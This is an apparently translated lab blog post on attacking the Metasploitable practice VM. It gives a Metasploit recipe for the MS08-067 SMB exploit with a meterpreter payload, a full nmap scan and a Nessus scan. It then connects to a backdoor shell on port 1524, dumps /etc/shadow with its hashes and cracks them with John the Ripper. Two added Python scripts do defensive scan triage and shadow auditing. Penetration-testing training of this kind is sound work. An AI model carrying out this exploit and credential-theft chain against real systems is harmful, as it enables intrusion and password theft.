1. Run Metasploit
#msfconsole
2. Select the SMB exploit for Windows
#use exploit/windows/smb/ms08_067_netapi
3. Show the options that need input
#show options
4. Set RHOST, because the options list asks for RHOST and it is required
#set rhost IP_target
5. Set the payload
#set payload windows/meterpreter/bind_tcp
6. Now exploit the Windows target
#exploit
Now use these commands on Linux to exploit :)
Saturday, November 17, 2012
Looking for vulnerabilities in Metasploitable
1. Information gathering
> Scan the target IP
#nmap 192.168.249.129
> For more detail, I used Zenmap:
open Zenmap, enter the target IP, choose the "Intense scan, all TCP ports" profile, then scan.
This is the equivalent command in the terminal:
#nmap -p 1-65535 -T4 -A -v 192.168.249.129
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-11-17 22:46 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:46
Scanning 192.168.249.129 [1 port]
Completed ARP Ping Scan at 22:46, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:46
Completed Parallel DNS resolution of 1 host. at 22:47, 9.40s elapsed
Initiating SYN Stealth Scan at 22:47
Scanning 192.168.249.129 [65535 ports]
Discovered open port 445/tcp on 192.168.249.129
Discovered open port 5900/tcp on 192.168.249.129
Discovered open port 111/tcp on 192.168.249.129
Discovered open port 22/tcp on 192.168.249.129
Discovered open port 21/tcp on 192.168.249.129
Discovered open port 23/tcp on 192.168.249.129
Discovered open port 139/tcp on 192.168.249.129
Discovered open port 53/tcp on 192.168.249.129
Discovered open port 3306/tcp on 192.168.249.129
Discovered open port 80/tcp on 192.168.249.129
Discovered open port 25/tcp on 192.168.249.129
Discovered open port 513/tcp on 192.168.249.129
Discovered open port 33496/tcp on 192.168.249.129
Discovered open port 37837/tcp on 192.168.249.129
Discovered open port 39199/tcp on 192.168.249.129
Discovered open port 6667/tcp on 192.168.249.129
Discovered open port 6000/tcp on 192.168.249.129
Discovered open port 514/tcp on 192.168.249.129
Discovered open port 1099/tcp on 192.168.249.129
Discovered open port 8180/tcp on 192.168.249.129
Discovered open port 54880/tcp on 192.168.249.129
Discovered open port 6697/tcp on 192.168.249.129
Discovered open port 5432/tcp on 192.168.249.129
Discovered open port 3632/tcp on 192.168.249.129
Discovered open port 8009/tcp on 192.168.249.129
Discovered open port 512/tcp on 192.168.249.129
Discovered open port 8787/tcp on 192.168.249.129
Discovered open port 1524/tcp on 192.168.249.129
Discovered open port 2121/tcp on 192.168.249.129
Discovered open port 2049/tcp on 192.168.249.129
Completed SYN Stealth Scan at 22:47, 1.41s elapsed (65535 total ports)
Initiating Service scan at 22:47
Scanning 30 services on 192.168.249.129
Completed Service scan at 22:49, 126.08s elapsed (30 services on 1 host)
Initiating RPCGrind Scan against 192.168.249.129 at 22:49
Completed RPCGrind Scan against 192.168.249.129 at 22:49, 0.14s elapsed (5 ports)
Initiating OS detection (try #1) against 192.168.249.129
NSE: Script scanning 192.168.249.129.
Initiating NSE at 22:49
Completed NSE at 22:49, 30.88s elapsed
Nmap scan report for 192.168.249.129
Host is up (0.0038s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2010-03-17 14:07:45
| Not valid after: 2010-04-16 14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 37837/tcp mountd
| 100005 1,2,3 48481/udp mountd
| 100021 1,3,4 33496/tcp nlockmgr
| 100021 1,3,4 45962/udp nlockmgr
| 100024 1 54880/tcp status
|_ 100024 1 57928/udp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: l@6.$id=@hk`#*Jt,{G2
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.249.1] (Too many unknown connections from your IP)
6697/tcp open irc Unreal ircd
|_ssl-cert: ERROR
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:19:32
| Source host: F347BFD8.7010A1C8.FFFA6D49.IP
|_Source ident: OK nmap
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
8787/tcp open unknown
33496/tcp open nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)
37837/tcp open mountd (mountd V1-3) 1-3 (rpc #100005)
39199/tcp open unknown
54880/tcp open status (status V1) 1 (rpc #100024)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 00:0C:29:80:7F:B6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 - 2.6.31
Uptime guess: 0.011 days (since Sat Nov 17 22:34:00 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-11-17 22:49:01 UTC-5
TRACEROUTE
HOP RTT ADDRESS
1 3.82 ms 192.168.249.129
NSE: Script Post-scanning.
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.90 seconds
Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
2. Service enumeration
#nmap -sV 192.168.249.129
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-11-17 22:51 WIT
Nmap scan report for 192.168.249.129
Host is up (0.00038s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open http Apache httpd 2.2.3
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:80:7F:B6 (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, www.http.com, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
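The two reports above do not cover the same ports: the default nmap -sV scan only probes the most common ports, so distccd on 3632, the IRC TLS port 6697 and the listener on 8787 never appear in it, and the service name is only a guess (1524 is reported as ingreslock? in one scan and http in the other). The following Python triage script is an added example, not part of the original post; it parses constructed excerpts of both reports, lists what the default scan missed and flags cleartext or unidentified services a defender should look at first.

```python
import re

# Constructed excerpts of the two nmap reports shown above: the full
# 1-65535 port scan with -A, and the default top-ports scan with -sV.
FULL_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
512/tcp open exec netkit-rsh rexecd
513/tcp open login
1524/tcp open ingreslock?
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
6697/tcp open irc Unreal ircd
8787/tcp open unknown
"""

DEFAULT_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
512/tcp open exec netkit-rsh rexecd
513/tcp open login
1524/tcp open http Apache httpd 2.2.3
"""

# One PORT/STATE/SERVICE[/VERSION] line; NSE script lines ('|', '|_') do not match.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Services that send credentials or commands in the clear, or rely on host trust.
RISKY = {"ftp": "cleartext credentials", "telnet": "cleartext login",
         "exec": "rexec: cleartext, trust-based", "login": "rlogin: trust-based",
         "shell": "rsh: trust-based"}


def parse_report(text):
    """Return {port: (state, service, version)} from an nmap text report."""
    found = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, _proto, state, service, version = m.groups()
            found[int(port)] = (state, service, version or "")
    return found


def triage(full, default):
    """Compare a full-range scan with a default-range scan and flag what to look at first."""
    findings = []
    for port, (_state, service, _version) in sorted(full.items()):
        if service in RISKY:
            findings.append((port, service, RISKY[service]))
        if service == "unknown" or service.endswith("?"):   # nmap was only guessing
            findings.append((port, service, "unidentified listener: inspect manually"))
    return {
        # open ports the default scan never probes, so they are missing from its report
        "missed_by_default": sorted(set(full) - set(default)),
        # same port, different identification between the two scans
        "reidentified": sorted(p for p in default if p in full and full[p][1] != default[p][1]),
        "findings": findings,
    }


if __name__ == "__main__":
    result = triage(parse_report(FULL_SCAN), parse_report(DEFAULT_SCAN))
    for key, value in result.items():
        print(f"{key}: {value}")
```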
3. Vulnerability assessment
> Now we use exploit-db to look for vulnerabilities
#cd /pentest/exploits/exploitdb/
#./searchsploit (input version here)
> Here I tried searching but couldn't find a vulnerability, so I used Nessus.
Go to the Nessus directory, then start the daemon:
#/etc/init.d/nessusd start
> Open a browser, go to https://bt:8834/ and log in.
Next, choose Scans, add a scan and fill in:
Name : (required)
Type : (required)
Policy : (required)
Scan target : (required)
Target file : (optional, not required)
(see screenshot)
Then press Launch Scan and wait a minute.
> Look at the report
It reports "Rogue shell backdoor detection", which means this system has a backdoor. Click on the rogue shell backdoor finding and note the port of the backdoor.
> Now we have the port of the backdoor, so the next step is exploitation.
4. Exploit
> This step is the exploit: because we now know the Metasploitable system has a backdoor, we connect to the backdoor through its port.
#telnet 192.168.249.129 1524
Here I have entered Metasploitable's system.
Now we want to know how many users are on this system:
#cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
Copy this shadow file into vulnerable.txt.
> Next, use John the Ripper on it to check the users' passwords on this system
#cd /pentest/passwords/john/
#./john /root/vulnerable.txt
Finished :)
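Most lines in the shadow file above have `*` or `!` in the hash field, so they cannot log in with a password at all; only the accounts with a `$1$` (md5crypt) hash are what John actually works on, and md5crypt is the fast legacy scheme that cracks quickly. The following Python audit is an added example, not part of the original post; it uses constructed shadow lines in the layout shown above with placeholder hashes, counts how many accounts really have a usable password and flags the ones still on md5crypt.

```python
from collections import Counter

# Constructed sample in the /etc/shadow layout shown above; the hash fields are
# placeholders, not real password hashes from any system.
SHADOW_SAMPLE = """\
root:$1$saltsalt$PLACEHOLDERxxxxxxxxxxxxxx:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
msfadmin:$1$saltsalt$PLACEHOLDERxxxxxxxxxxxxxx:14684:0:99999:7:::
svc:$6$saltsalt$PLACEHOLDERxxxxxxxxxxxxxx:15480:0:99999:7:::
broken::14684:0:99999:7:::
"""

# crypt(3) hash prefixes; md5crypt ($1$) is the legacy, fast-to-brute-force scheme.
HASH_ALGOS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
              "$y$": "yescrypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}


def classify(hash_field):
    """Map the second shadow field to what it means for login and cracking."""
    if hash_field.startswith(("*", "!")):
        return "locked"            # no valid hash: password login disabled
    if hash_field == "":
        return "empty"             # passwordless login may be possible
    for prefix, name in HASH_ALGOS.items():
        if hash_field.startswith(prefix):
            return name
    return "other"                 # traditional DES crypt or unknown format


def audit_shadow(text):
    """Return a list of (account, classification) for each shadow line."""
    rows = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 9:        # a shadow entry has 9 colon-separated fields
            continue
        rows.append((fields[0], classify(fields[1])))
    return rows


def summarize(rows):
    """Counts per classification, e.g. how many accounts are actually locked."""
    return Counter(kind for _, kind in rows)


def password_accounts(rows):
    """Accounts that can log in with a password: the only lines worth feeding to john."""
    return [name for name, kind in rows if kind != "locked"]


def weak_scheme_accounts(rows):
    """Accounts still protected by md5crypt: candidates for a forced password reset."""
    return [name for name, kind in rows if kind == "md5crypt"]


if __name__ == "__main__":
    rows = audit_shadow(SHADOW_SAMPLE)
    print(f"{len(rows)} accounts: {dict(summarize(rows))}")
    print("accounts with a usable password:", password_accounts(rows))
    print("still on md5crypt:", weak_scheme_accounts(rows))
```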